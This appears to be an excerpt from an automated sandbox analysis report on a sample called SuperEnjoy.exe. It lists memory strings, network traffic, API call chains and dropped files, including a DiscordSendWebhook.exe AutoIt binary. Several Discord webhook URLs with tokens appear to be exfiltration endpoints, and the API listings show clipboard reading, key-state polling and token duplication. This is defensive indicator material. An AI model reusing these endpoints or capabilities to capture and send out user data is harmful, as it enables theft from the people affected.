Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: DiscordSendWebhook.exe, 00000005.00000002.212957274.0000000001304000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000005.00000003.211824013.00000000011E7000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.227632700.000000000184D000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.229166020.0000000001751000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000003.237090886.0000000001705000.00000004.00000001.sdmpString found in binary or memory: http://www.phoenix125.com/DiscordAvatar.jpg
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
Source: mshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: mshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: mshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
Source: mshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
Source: DiscordSendWebhook.exe, 00000005.00000003.211824013.00000000011E7000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.229166020.0000000001751000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000002.229827440.00000000016E9000.00000004.00000020.sdmpString found in binary or memory: https://discord.com/
Source: DiscordSendWebhook.exe, 00000005.00000002.212751915.0000000001198000.00000004.00000020.sdmpString found in binary or memory: https://discord.com/#
Source: DiscordSendWebhook.exe, 0000000D.00000003.229166020.0000000001751000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/B
Source: SuperEnjoy.exe, 0000000E.00000002.668979877.0000000001107000.00000004.00000040.sdmpString found in binary or memory: https://discord.com/api/webhook-
Source: DiscordSendWebhook.exe, 0000000D.00000002.229811564.00000000016E0000.00000004.00000020.sdmpString found in binary or memory: https://discord.com/api/webhooks/80
Source: mshta.exe, 0000001D.00000002.668067357.0000000000C80000.00000004.00000040.sdmp, mshta.exe, 0000001D.00000002.667059495.0000000000790000.00000004.00000020.sdmp, EEFE.bat.1.drString found in binary or memory: https://discord.com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UVyVIbp-4tehV
Source: EEFE.bat.1.drString found in binary or memory: https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FY
Source: DiscordSendWebhook.exe, 00000012.00000003.237090886.0000000001705000.00000004.00000001.sdmpString found in binary or memory: https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS
Source: DiscordSendWebhook.exe, 00000005.00000002.212957274.0000000001304000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000005.00000003.211824013.00000000011E7000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.227632700.000000000184D000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000002.243204453.000000000170D000.00000004.00000001.sdmpString found in binary or memory: https://discordapp.com/api/webhooks/987654321098765432/6543210987654321ZYXWVUTSRQPONMLKJIHGFEDCBAzyx
Source: DiscordSendWebhook.exe, 00000005.00000002.212957274.0000000001304000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000005.00000000.208904699.0000000000438000.00000002.00020000.sdmp, DiscordSendWebhook.exe, 00000005.00000003.211824013.00000000011E7000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.227632700.000000000184D000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000000.225556493.0000000000438000.00000002.00020000.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.229166020.0000000001751000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000000.231929534.0000000000B08000.00000002.00020000.sdmp, DiscordSendWebhook.exe, 00000012.00000003.237090886.0000000001705000.00000004.00000001.sdmp, DiscordSendWebhook.exe.14.drString found in binary or memory: https://github.com/phoenix125
Source: DiscordSendWebhook.exe, 00000012.00000003.241293186.000000000174A000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000003.234936056.000000000177D000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000003.235074431.000000000178A000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: DiscordSendWebhook.exe, 00000005.00000002.212957274.0000000001304000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.227744228.0000000001886000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000002.243241458.0000000001739000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.3:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.3:49730 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003E425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_003E425A
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003E425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_003E425A
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_003D0219
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003FCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_003FCDAC
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00ACCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,18_2_00ACCDAC

System Summary:

barindex
Binary is likely a compiled AutoIt script fileShow sources
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: This is a third-party compiled AutoIt script.5_2_00373B4C
Source: DiscordSendWebhook.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: DiscordSendWebhook.exe, 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: DiscordSendWebhook.exe, 0000000D.00000002.229491053.0000000000425000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
Source: DiscordSendWebhook.exe, 0000000D.00000002.229491053.0000000000425000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: This is a third-party compiled AutoIt script.18_2_00A43B4C
Source: DiscordSendWebhook.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: DiscordSendWebhook.exe, 00000012.00000000.231860968.0000000000AF5000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: DiscordSendWebhook.exe.14.drString found in binary or memory: This is a third-party compiled AutoIt script.
Source: DiscordSendWebhook.exe.14.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: C:\Windows\System32\cmd.exeProcess Stats: CPU usage > 98%
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D4021: CreateFileW,DeviceIoControl,CloseHandle,5_2_003D4021
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003C8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_003C8858
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_003D545F
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AA545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,18_2_00AA545F
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile created: C:\Windows\Temp\1810.tmp
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile deleted: C:\Windows\Temp\1810.tmp
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_0040E8001_2_0040E800
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_0040C8381_2_0040C838
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_0040F1CA1_2_0040F1CA
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_004105F01_2_004105F0
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_004112501_2_00411250
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_004106731_2_00410673
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_004102D01_2_004102D0
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_0040B2E71_2_0040B2E7
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_004102F01_2_004102F0
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_004106B91_2_004106B9
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0037E8005_2_0037E800
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003933C75_2_003933C7
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0039DBB55_2_0039DBB5
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0037FE405_2_0037FE40
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0037E0605_2_0037E060
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003F804A5_2_003F804A
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003841405_2_00384140
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003924055_2_00392405
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003A65225_2_003A6522
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003A267E5_2_003A267E
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003F06655_2_003F0665
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0039283A5_2_0039283A
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003868435_2_00386843
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003A89DF5_2_003A89DF
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_00388A0E5_2_00388A0E
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003A6A945_2_003A6A94
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003F0AE25_2_003F0AE2
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D8B135_2_003D8B13
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003CEB075_2_003CEB07
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0039CD615_2_0039CD61
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003A70065_2_003A7006
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0038710E5_2_0038710E
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003831905_2_00383190
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003712875_2_00371287
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0039F4195_2_0039F419
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003856805_2_00385680
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003916C45_2_003916C4
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003978D35_2_003978D3
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003858C05_2_003858C0
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_00391BB85_2_00391BB8
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003A9D055_2_003A9D05
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0039BFE65_2_0039BFE6
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_00391FD05_2_00391FD0
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_0040E80014_2_0040E800
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_0040C83814_2_0040C838
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_0040F1CA14_2_0040F1CA
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_004105F014_2_004105F0
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_0041125014_2_00411250
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_0041067314_2_00410673
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_004102D014_2_004102D0
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_0040B2E714_2_0040B2E7
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_004102F014_2_004102F0
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_004106B914_2_004106B9
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A4E80018_2_00A4E800
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A633C718_2_00A633C7
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A6DBB518_2_00A6DBB5
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A4FE4018_2_00A4FE40
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A4E06018_2_00A4E060
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AC804A18_2_00AC804A
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A5414018_2_00A54140
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A6240518_2_00A62405
